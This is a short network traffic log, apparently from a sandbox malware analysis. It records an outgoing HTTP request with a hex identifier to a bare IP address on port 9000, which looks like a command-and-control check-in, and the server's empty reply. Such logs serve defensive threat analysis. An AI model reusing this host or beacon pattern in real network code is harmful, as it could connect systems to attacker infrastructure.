Nov 28, 2024 09:53:51.344575882 CET	111	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 45.141.84.168:9000 Connection: Keep-Alive
Nov 28, 2024 09:53:52.746264935 CET	414	IN	HTTP/1.1 200 OK Cache-Control: no-cache Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH Access-Control-Allow-Headers: * Access-Control-Expose-Headers: Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Host: *:9000 Date: Thu, 28 Nov 2024 08:53:52 GMT Connection: close